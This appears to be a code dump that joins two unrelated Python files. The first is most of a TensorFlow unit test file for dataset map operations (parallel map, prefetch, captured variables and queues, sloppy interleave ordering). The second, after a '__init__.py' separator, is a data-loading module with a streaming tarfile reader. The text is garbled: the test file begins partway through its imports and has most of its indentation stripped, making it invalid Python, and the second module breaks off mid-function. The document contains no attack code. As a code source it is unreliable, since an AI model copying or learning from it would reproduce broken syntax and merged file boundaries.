from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import map_fn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
def _make_coordinated_sloppy_dataset(num_elements, num_parallel_calls):
"""Produces a dataset iterator and events to control the order of elements.
Args:
num_elements: the number of input elements
num_parallel_calls: the degree of map parallelism
  Returns:
    The constructed `Dataset` and a dict of per-element `threading.Event`s that
    can be used to control the order of output elements.
  """
# Set up threading events used to sequence when items are produced that
# are subsequently interleaved. These events allow us to deterministically
# simulate slowdowns and force sloppiness.
coordination_events = {i: threading.Event() for i in range(num_elements)}
def map_py_fn(x):
coordination_events[x].wait()
coordination_events[x].clear()
return x * x
def map_fn(x):
return script_ops.py_func(map_py_fn, [x], x.dtype)
options = dataset_ops.Options()
options.experimental_deterministic = False
dataset = dataset_ops.Dataset.range(num_elements).map(
map_fn, num_parallel_calls).with_options(options)
return dataset, coordination_events
@test_util.run_all_in_graph_and_eager_modes
class MapTest(test_base.DatasetTestBase, parameterized.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn).repeat(count)
self.assertEqual([c.shape[1:] for c in components],
[shape for shape in dataset.output_shapes])
return dataset
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
# Test single-threaded access to the iterator.
get_next = self.getNext(self._buildMapDataset(components, 14))
for _ in range(14):
for i in range(7):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): add eager coverage, different threads run in graph
# context.
@test_util.run_v1_only("b/120545219")
def testSkipEagerMapDatasetMultithreaded(self):
# Test multi-threaded access to the same iterator.
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
get_next = self.getNext(self._buildMapDataset(components, 18))
results = []
with self.cached_session() as sess:
def iterator_thread():
while True:
try:
results.append(sess.run(get_next()))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_parallel_calls,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_parallel_calls=num_parallel_calls).prefetch(
output_buffer_size).repeat(count)
self.assertEqual([c.shape[1:] for c in components],
[shape for shape in dataset.output_shapes])
return dataset
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
def do_test(num_parallel_calls, output_buffer_size):
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
# Test single-threaded access to the iterator.
get_next = self.getNext(
self._buildParallelMapDataset(components, 14, num_parallel_calls,
output_buffer_size))
for _ in range(14):
for i in range(7):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
    for num_parallel_calls_val, output_buffer_size_val in [
        (1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_parallel_calls_val, output_buffer_size_val)
# TODO(b/117581999): add eager coverage, different threads run in graph
# context.
@test_util.run_v1_only("b/120545219")
def testSkipEagerParallelMapDatasetMultithreaded(self):
def do_test(num_parallel_calls, output_buffer_size):
# Test multi-threaded access to the same iterator.
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
get_next = self.getNext(
self._buildParallelMapDataset(components, 18, num_parallel_calls,
output_buffer_size))
results = []
with self.cached_session() as sess:
def iterator_thread():
while True:
try:
results.append(sess.run(get_next()))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_parallel_calls_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_parallel_calls_val, output_buffer_size_val)
def testImplicitDisposeParallelMapDataset(self):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testCaptureIterator(self):
def _build_ds(iterator):
def _map_fn(x):
get_next = iterator.get_next()
return x * get_next
return dataset_ops.Dataset.range(10).map(_map_fn)
def _build_graph():
if context.executing_eagerly():
captured_iterator = iter(dataset_ops.Dataset.range(10))
else:
captured_iterator = dataset_ops.Dataset.range(
10).make_initializable_iterator()
ds = _build_ds(captured_iterator)
return captured_iterator, ds
captured_iter, ds = _build_graph()
if not context.executing_eagerly():
self.evaluate(captured_iter.initializer)
get_next = self.getNext(ds, requires_initialization=True)
for i in range(10):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
dataset = input_sentences.map(lambda x: string_ops.string_split([x]).values
).map(table.lookup)
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(table.initializer)
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
dataset = dataset_ops.Dataset.from_tensors(0).repeat(
-1).map(lambda _: queue.dequeue())
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(enqueue_op)
self.evaluate(close_op)
for element in elements:
self.assertEqual(element, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): Possible deadlock in eager mode, debug.
@test_util.run_v1_only("b/120545219")
def testSkipEagerCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
dataset = dataset_ops.Dataset.from_tensors(0).repeat(
-1).map(lambda _: (queue.dequeue(), queue_2.dequeue()))
self.evaluate(enqueue_op)
self.evaluate(close_op)
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(100):
self.assertCountEqual([elements[i * 2], elements[i * 2 + 1]],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
  # TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@test_util.run_v1_only("b/121264236")
def testSkipEagerCaptureConstantsWithConflictingDevices(self):
config = config_pb2.ConfigProto(
device_count={"CPU": 3}, log_device_placement=True)
with self.cached_session(config=config):
with ops.device("/device:CPU:0"):
a = constant_op.constant(3.0)
with ops.device("/device:CPU:1"):
b = constant_op.constant(5.0)
def func(_):
return math_ops.add(a, b)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10).map(func)
expected_output = [8.0] * 10
self.assertDatasetProduces(dataset, expected_output=expected_output)
  # TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@test_util.run_v1_only(
"defun will convert RefVariables to ResourceVariables.")
def testSkipEagerRefVariablesWithConflictingDevices(self):
config = config_pb2.ConfigProto(
device_count={"CPU": 3}, log_device_placement=True)
with self.cached_session(config=config):
def func(_):
with ops.device("/device:CPU:0"):
a = variables.VariableV1(3.0)
with ops.device("/device:CPU:1"):
b = variables.VariableV1(5.0)
return math_ops.add(a, b)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10).map(func)
self.evaluate(variables.global_variables_initializer())
expected_output = [8.0] * 10
self.assertDatasetProduces(
dataset,
expected_output=expected_output,
requires_initialization=True)
  # TODO(b/121264236): add eager mode coverage when we have multi-device setup.
@test_util.run_v1_only("b/121264236")
def testSkipEagerResourceVariablesWithConflictingDevices(self):
config = config_pb2.ConfigProto(
device_count={"CPU": 3}, log_device_placement=True)
with self.cached_session(config=config):
def func(_):
with ops.device("/device:CPU:0"):
a = variables.Variable(3.0)
with ops.device("/device:CPU:1"):
b = variables.Variable(5.0)
return math_ops.add(a, b)
# The MapDataset node ends up with two ResourceVariable inputs, one on
# device CPU:0 and the other on device CPU:1. The placer cannot resolve
# this as it cannot place the MapDatasetOp on both devices.
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10).map(func)
expected_error = (
errors.InvalidArgumentError,
"Could not colocate node with its resource and reference inputs")
self.assertDatasetProduces(
dataset, expected_error=expected_error, requires_initialization=True)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(
10).map(lambda _: counter_var.assign_add(1))
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(counter_var.initializer)
for i in range(10):
self.assertEqual(i, self.evaluate(counter_var))
self.assertEqual(i + 1, self.evaluate(get_next()))
self.assertEqual(10, self.evaluate(counter_var))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(10, self.evaluate(counter_var))
# TODO(b/117581999): error not captured for eager mode, debug.
@test_util.run_v1_only("b/120545219")
def testSkipEagerCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(
10).map(lambda _: counter_var.assign_add(1))
get_next = self.getNext(dataset, requires_initialization=True)
with self.assertRaises(errors.NotFoundError):
self.evaluate(get_next())
def testSeededStatefulOperatorIsProperlyStateful(self):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(
10).map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
get_next = self.getNext(dataset, requires_initialization=True)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(self.evaluate(get_next()))
self.assertLen(random_values, 10)
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
get_next = self.getNext(dataset, requires_initialization=True)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(self.evaluate(get_next()))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testStatefulMapKeepsStateAcrossIterators(self):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda _: random_ops.random_uniform((), seed=11)).repeat(1000).batch(10)
get_next = self.getNext(dataset)
random_values = self.evaluate(get_next())
# Assert that one of the next 99 batches yielded by the iterator is
# different from the first.
i = 0
while i < 99:
if np.any(random_values != self.evaluate(get_next())):
break
i += 1
self.assertLess(i, 99)
def testStatefulOperationInShortCircuit(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
def increment_fn(x):
counter_var.assign_add(1)
return x
dataset = dataset_ops.Dataset.range(10).map(increment_fn)
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(counter_var.initializer)
for i in range(10):
self.assertEqual(i, self.evaluate(counter_var))
self.assertEqual(i, self.evaluate(get_next()))
self.assertEqual(10, self.evaluate(counter_var))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(10, self.evaluate(counter_var))
def testMapDict(self):
dataset = dataset_ops.Dataset.range(10).map(
lambda x: {"foo": x * 2, "bar": x**2}).map(
lambda d: d["foo"] + d["bar"])
self.assertDatasetProduces(
dataset, expected_output=[i * 2 + i**2 for i in range(10)])
def testMapNamedtuple(self, count=10):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(count)
images = labels.map(lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = dataset_tuple.map(example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = dataset_tuple.map(preprocess_tuple)
dataset_namedtuple = dataset_namedtuple.map(preprocess_namedtuple)
next_tuple = self.getNext(dataset_tuple)
next_namedtuple = self.getNext(dataset_namedtuple)
# make sure both datasets contain the same data
for i in range(count):
tuple_, namedtuple_ = self.evaluate([next_tuple(), next_namedtuple()])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(next_namedtuple())
def testUseStepContainerInMap(self):
row = np.arange(6)
dataset = dataset_ops.Dataset.from_tensors(
row).map(lambda elems: map_fn.map_fn(lambda x: x * x, elems))
self.assertDatasetProduces(dataset, expected_output=[row**2])
def testCaseAndCondInMap(self):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
def defaults_two():
return control_flow_ops.cond(
math_ops.equal(math_ops.mod(x, 2), 0),
multiply,
divide,
name="cond_mult")
pred_fn_pairs = {
math_ops.logical_or(math_ops.equal(y, 2), math_ops.equal(y, 3)):
defaults_two,
}
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
def build_dataset(row, num):
dataset = dataset_ops.Dataset.from_tensor_slices(
row).map(lambda x: control_map_fn(x, num))
return self.getNext(dataset)
row = np.arange(6)
for num in [2, 3, 4]:
get_next = build_dataset(row, num)
for i in range(6):
self.assertEqual(
(i // 2 if i % 2 else i * 2) if (num == 2 or num == 3) else i * 2,
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testCaseInWhileInMap(self):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
pred_fn_pairs = {
math_ops.logical_or(math_ops.equal(y, 2), math_ops.equal(y, 3)):
divide,
}
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
def build_dataset(row, num):
# pylint: disable=g-long-lambda
dataset = dataset_ops.Dataset.from_tensors(
row).map(lambda elems: map_fn.map_fn(
lambda x: control_map_fn(x, num), elems))
return self.getNext(dataset)
row = np.arange(6)
for num in [2, 3, 4]:
get_next = build_dataset(row, num)
self.assertAllEqual(
[x // 2 if (num == 2 or num == 3) else x * 2 for x in row],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testCaseAndCondInWhileInMap(self):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
def defaults_two():
return control_flow_ops.cond(
math_ops.equal(math_ops.mod(x, 2), 0),
multiply,
divide,
name="cond_mult")
pred_fn_pairs = {
math_ops.logical_or(math_ops.equal(y, 2), math_ops.equal(y, 3)):
defaults_two,
}
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
row = np.arange(6)
num = 2
# pylint: disable=g-long-lambda
dataset = dataset_ops.Dataset.from_tensors(
row).map(lambda elems: map_fn.map_fn(
lambda x: control_map_fn(x, num), elems))
# pylint: enable=g-long-lambda
get_next = self.getNext(dataset)
self.assertAllEqual([(x // 2 if x % 2 else x * 2) if
(num == 2 or num == 3) else x * 2 for x in row],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testNestedListMapDataset(self):
dataset = dataset_ops.Dataset.from_tensors(
[0, 1, 2]).repeat(10).map(lambda a: ([a[1], a[0] + a[2]], a[1]))
expected_output = [(np.array([1, 2]), 1)] * 10
self.assertDatasetProduces(dataset, expected_output=expected_output)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
def do_test(buffer_size):
dataset = dataset_ops.Dataset.range(100).map(_map_fn).prefetch(
buffer_size)
get_next = self.getNext(dataset)
# Simple test that prefetch yields the expected values in the
# expected order.
for i in range(100):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
for buffer_size in [1, 10, 100, 1000]:
do_test(buffer_size)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
def do_test_ev(buffer_size):
dataset = dataset_ops.Dataset.range(100).map(_map_fn).prefetch(
buffer_size)
get_next = self.getNext(dataset)
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, self.evaluate(get_next()))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
for buffer_size in range(1, set_event_during_invocation):
do_test_ev(buffer_size)
def testReturnList(self):
dataset = dataset_ops.Dataset.range(
10).map(lambda x: [x, constant_op.constant(37.0)])
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
dataset = dataset_ops.Dataset.range(10).map(_map_fn)
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
dataset = dataset_ops.Dataset.range(10).map(_sparse)
self.assertDatasetProduces(
dataset, expected_output=[_sparse(i) for i in range(10)])
def testSparseChain(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
dataset = dataset_ops.Dataset.range(10).map(_sparse).map(_check)
self.assertDatasetProduces(
dataset,
expected_output=[self.evaluate(_check(_sparse(i))) for i in range(10)])
def testParallelMapOutOfRangeError(self):
def raising_py_func(i):
if i == 100:
raise StopIteration()
else:
return i
dataset = dataset_ops.Dataset.range(105).map(
lambda x: script_ops.py_func(raising_py_func, [x], dtypes.int64),
num_parallel_calls=2)
get_next = self.getNext(dataset)
for i in range(100):
self.assertEqual(i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testConstantOutput(self):
dataset = dataset_ops.Dataset.range(10).map(lambda x: [x, "hello", 10])
self.assertDatasetProduces(dataset, [(i, b"hello", 10) for i in range(10)])
def testWarnOnLookupTable(self):
def collecting_function(x):
_ = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer([], []), 0.0, name="t1")
return x
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).map(collecting_function)
# NOTE(mrry): Python 3 prints other warnings in addition to the one we are
# testing, so we search for the expected warning.
self.assertGreaterEqual(len(w), 1)
found_warning = False
for warning in w:
if ("Creating lookup tables inside a function passed to Dataset.map() is "
"not supported." in str(warning)):
found_warning = True
break
self.assertTrue(found_warning)
def testNestedDatasetMap(self):
# TODO(b/110122868): When iterators can yield a `tf.data.Dataset`, remove
# the `get_single_element()` call.
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0]).map(
dataset_ops.Dataset.from_tensor_slices).map(
lambda ds: ds.batch(3)).flat_map(lambda x: x)
self.assertDatasetProduces(dataset, expected_output=[[1.0, 2.0, 3.0]])
def testReturnValueError(self):
dataset = dataset_ops.Dataset.from_tensors([1.0, 2.0, 3.0])
with self.assertRaisesRegexp(
TypeError, r"Unsupported return value from function passed to "
r"Dataset.map\(\): None."):
_ = dataset.map(lambda x: None)
def testBrokenFunctionErrorOnInitialization(self):
dataset = dataset_ops.Dataset.from_tensor_slices([1.0, 2.0, 3.0])
def broken_function(_):
"""A function deliberately designed to fail on instantiation."""
value = []
tensor_value = attr_value_pb2.AttrValue()
tensor_value.tensor.CopyFrom(
tensor_util.make_tensor_proto(
value, dtype=dtypes.float32, shape=[0], verify_shape=False))
dtype_value = attr_value_pb2.AttrValue(type=dtypes.int32.as_datatype_enum)
# Create a "Const" op with a `tf.float32` value and a `tf.int32` type
# attr.
const_tensor = ops.get_default_graph().create_op(
"Const", [], [dtypes.int32],
attrs={
"value": tensor_value,
"dtype": dtype_value
},
name="BrokenConst").outputs[0]
return const_tensor
dataset = dataset.map(broken_function)
self.assertDatasetProduces(
dataset, expected_error=(errors.InvalidArgumentError, "BrokenConst"))
# pylint: disable=g-long-lambda
@parameterized.named_parameters(
("Map", lambda dataset, func:
dataset_ops.MapDataset(dataset, func, use_inter_op_parallelism=False)),
("ParallelMap", lambda dataset, func:
dataset_ops.ParallelMapDataset(dataset, func, num_parallel_calls=1,
use_inter_op_parallelism=False)),
)
def testNoInterOpParallelism(self, make_dataset_fn):
dataset = dataset_ops.Dataset.from_tensors(0)
def _get_tid():
return np.int64(threading.current_thread().ident)
def _map_fn(_):
tids = []
for _ in range(10):
tids.append(script_ops.py_func(_get_tid, [], dtypes.int64))
return tids
dataset = make_dataset_fn(dataset, _map_fn)
get_next = self.getNext(dataset)
tids = self.evaluate(get_next())
self.assertTrue(all(tids[0] == tid for tid in tids))
# pylint: enable=g-long-lambda
@parameterized.named_parameters(
("SequentialIdentity", None, lambda x: x, None),
("SequentialReplicate", None, lambda x: (x, x), None),
("SequentialSwap", (None, None), lambda x, y: (y, x), None),
("SequentialProject", (None, None), lambda x, y: x, None),
("ParallelIdentity", None, lambda x: x, 10),
("ParallelReplicate", None, lambda x: (x, x), 10),
("ParallelSwap", (None, None), lambda x, y: (y, x), 10),
("ParallelProject", (None, None), lambda x, y: x, 10),
)
def testShortCircuit(self, structure, map_fn, num_parallel_calls):
dataset = self.structuredDataset(structure).repeat().map(
map_fn, num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset)
if isinstance(structure, tuple):
expected = map_fn(*self.evaluate(self.structuredElement(structure)))
else:
expected = map_fn(self.evaluate(self.structuredElement(structure)))
self.assertEqual(expected, self.evaluate(get_next()))
@parameterized.named_parameters(
("Sequential", None),
("Parallel", 10),
)
def testShortCircuitCapturedInput(self, num_parallel_calls):
captured_t = variables.Variable(42)
dataset = self.structuredDataset(None).repeat().map(
lambda x: captured_t, num_parallel_calls=num_parallel_calls)
self.evaluate(variables.global_variables_initializer())
get_next = self.getNext(dataset, requires_initialization=True)
self.assertEqual(42, self.evaluate(get_next()))
@parameterized.named_parameters(
("1", 1, 1),
("2", 10, 1),
("3", 10, 10),
("4", 100, 1),
("5", 100, 10),
("6", 100, 100),
)
def testSloppyInterleaveInOrder(self, num_elements, num_parallel_calls):
dataset, coordination_events = _make_coordinated_sloppy_dataset(
num_elements, num_parallel_calls)
options = dataset_ops.Options()
options.experimental_threading = threading_options.ThreadingOptions()
options.experimental_threading.private_threadpool_size = (
num_parallel_calls + 1)
dataset = dataset.with_options(options)
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(num_elements):
coordination_events[i].set()
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@parameterized.named_parameters(
("1", 10, 10),
("2", 100, 10),
("3", 100, 100),
)
def testSloppyInterleaveOutOfOrder(self, num_elements, num_parallel_calls):
dataset, coordination_events = _make_coordinated_sloppy_dataset(
num_elements, num_parallel_calls)
options = dataset_ops.Options()
options.experimental_threading = threading_options.ThreadingOptions()
options.experimental_threading.private_threadpool_size = (
num_parallel_calls + 1)
dataset = dataset.with_options(options)
get_next = self.getNext(dataset, requires_initialization=True)
elements = [x for x in range(num_elements)]
for i in [1, 4, 7]:
elements[i], elements[i + 1] = elements[i + 1], elements[i]
for element in elements:
coordination_events[element].set()
self.assertEqual(element * element, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@parameterized.named_parameters(
("Map", None),
("ParallelMap", 12),
)
def testPreserveCardinality(self, num_parallel_calls):
def py_fn(_):
raise StopIteration()
dataset = dataset_ops.DatasetV2.from_tensors(0).map(
lambda x: script_ops.py_func(py_fn, [x], dtypes.int64),
num_parallel_calls=num_parallel_calls)
get_next = self.getNext(dataset)
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
if __name__ == "__main__":
test.main()
|
__init__.py
|
import os
import zstandard
import ujson as json
import time
import tarfile
import codecs
from functools import reduce
import jsonlines
import io
from zipfile import ZipFile
import gzip
from math import ceil
import mmap
import multiprocessing as mp
from pathlib import Path
#TODO : Hook FilterData Class for processing and additional processing.
from .code_clippy_data_utils import FilterData
VALID_EXTENSIONS = ['openwebtext.tar.xz', '_data.xz', '.dat.zst', '.jsonl', '.jsonl.zst', '.jsonl.zst.tar', '.json.zst', '.txt', '.zip', '.tar.gz', '.json.gz', '.gz']
def has_valid_extension(file):
return any([file.endswith(ext) for ext in VALID_EXTENSIONS])
def _listdir_or_file(x):
if isinstance(x, list):
return reduce(lambda x, y: x + y, map(listdir_or_file, sorted(x)))
if os.path.isfile(x):
return [x]
elif os.path.isdir(x):
return [str(Path(x) / fn) for fn in sorted(os.listdir(x))]
else:
raise FileNotFoundError(f"{x} not found")
def listdir_or_file(x):
return list(filter(has_valid_extension, _listdir_or_file(x)))
def tarfile_reader(file, streaming=False):
# we need our own tarfile parser because `tarfile` doesn't work well for
# big tarfiles; it seems to be reading the entire file to get a list of
# where all the files are - but we don't need that because we just need
# to see each file once. surprisingly, `tarfile` doesn't expose any
# facilities for this. the only options are 1. load the entire tarfile
# and then query by filename or 2. extract to disk - and neither of
# these is what we want.
offset = 0
paxfilesize = None
while True:
hdr = file.read(512)
offset += 512
# https://www.gnu.org/software/tar/manual/html_node/Standard.html
# end at 135 not 136 because of \0 terminator
if hdr[124:135] == b'\0'*11:
# end of record
break
fname = hdr[:100].split(b'\0')[0]
# if the file is too big to fit in the size field, tarfiles will actually
# include a PaxHeader with the size in it, applicable to the immediate next file.
if paxfilesize is not None:
size = paxfilesize
